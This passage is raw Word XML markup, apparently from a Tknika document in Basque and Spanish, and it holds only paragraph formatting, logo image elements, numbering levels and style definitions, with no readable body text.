  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
    <w:pPr>
      <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b w:val="1"/>
        <w:color w:val="0000ff"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:u w:val="single"/>
      </w:rPr>
    </w:pPr>
    <w:hyperlink r:id="rId1">
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www.tknika.eus</w:t>
      </w:r>
    </w:hyperlink>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
    <w:pPr>
      <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
    <w:pPr>
      <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="5400040" cy="265242"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr id="143" name="image11.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image11.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId2"/>
                  <a:srcRect b="0" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="5400040" cy="26524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line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="4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color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="2555266" cy="1187264"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr descr="C:\Users\Ana\AppData\Local\Microsoft\Windows\INetCache\Content.Word\LOGO_vertical_HQ.PNG" id="159" name="image20.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="C:\Users\Ana\AppData\Local\Microsoft\Windows\INetCache\Content.Word\LOGO_vertical_HQ.PNG" id="0" name="image20.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="0" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="2555266" cy="118726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firstLine="0"/>
      <w:jc w:val="cente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b w:val="1"/>
        <w:i w:val="0"/>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="52"/>
        <w:szCs w:val="52"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="792" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="cfda2d"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1224" w:hanging="504"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="cfda2d"/>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4"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="eu-ES"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="56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left="720" w:hanging="360"/>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left="1440" w:hanging="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
      <w:ind w:left="2160" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
      <w:ind w:left="2880" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="220" w:lineRule="auto"/>
      <w:ind w:left="3600" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="200" w:lineRule="auto"/>
      <w:ind w:left="4320" w:hanging="360"/>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jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:smallCaps w:val="1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="4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left="1440" w:hanging="360"/>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left="2160" w:hanging="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
      <w:ind w:left="2880" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
      <w:ind w:left="3600" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="220" w:lineRule="auto"/>
      <w:ind w:left="4320" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="200" w:lineRule="auto"/>
      <w:ind w:left="5040" w:hanging="360"/>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240" w:lineRule="auto"/>
      <w:ind w:left="432" w:hanging="432"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:smallCaps w:val="1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="576" w:hanging="576"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
      <w:ind w:left="1224" w:hanging="504.00000000000006"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
      <w:ind w:left="864" w:hanging="864"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="220" w:lineRule="auto"/>
      <w:ind w:left="1008" w:hanging="1008"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="200" w:lineRule="auto"/>
      <w:ind w:left="1152" w:hanging="1152"/>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A6E62"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00C20C8D"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:before="360" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b w:val="1"/>
      <w:caps w:val="1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo2Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00557278"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo3Car"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="80" w:before="280"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="40" w:before="240"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="40" w:before="220"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="40" w:before="200"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo7Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="001C3CE4"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="0" w:before="4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ar"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="001C3CE4"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="8"/>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1C3CE4"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="8"/>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table" w:styleId="Tablaconcuadrcula">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00AE315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AE315E"/>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AE315E"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:cs="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafobsico" w:customStyle="1">
    <w:name w:val="[Párrafo básico]"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00703CA2"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Minion Pro" w:cs="Minion Pro" w:hAnsi="Minion Pro"/>
      <w:color w:val="000000"/>
      <w:lang w:val="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezado">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EncabezadoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="008E651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E6512"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="008E651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8E6512"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="000C1A8F"/>
    <w:rPr>
      <w:color w:val="0000ff" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo1Car" w:customStyle="1">
    <w:name w:val="Título 1 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C20C8D"/>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b w:val="1"/>
      <w:caps w:val="1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo2Car" w:customStyle="1">
    <w:name w:val="Título 2 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00557278"/>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice" w:customStyle="1">
    <w:name w:val="Índice"/>
    <w:basedOn w:val="TDC1"/>
    <w:rsid w:val="00CC233F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="7371"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:noProof w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="120"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention" w:customStyle="1">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="007E1C6E"/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:color="auto" w:fill="e1dfdd" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cdigo" w:customStyle="1">
    <w:name w:val="Código"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00677B88"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:color="auto" w:space="1" w:sz="4" w:val="single"/>
        <w:left w:color="auto" w:space="4" w:sz="4" w:val="single"/>
        <w:bottom w:color="auto" w:space="1" w:sz="4" w:val="single"/>
        <w:right w:color="auto" w:space="4" w:sz="4" w:val="single"/>
      </w:pBdr>
      <w:shd w:color="auto" w:fill="auto" w:val="pct5"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:hAnsi="Courier New"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Refdecomentario">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00483984"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textocomentario">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextocomentarioCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00483984"/>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483984"/>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Asuntodelcomentario">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Textocomentario"/>
    <w:next w:val="Textocomentario"/>
    <w:link w:val="AsuntodelcomentarioCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00483984"/>
    <w:rPr>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="AsuntodelcomentarioCar" w:customStyle="1">
    <w:name w:val="Asunto del comentario Car"/>
    <w:basedOn w:val="TextocomentarioCar"/>
    <w:link w:val="Asuntodelcomentario"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:rsid w:val="00483984"/>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00483984"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculovisitado">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="005327CD"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="120"/>
      <w:ind w:left="240"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="480"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009C33BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="720"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="1"/>
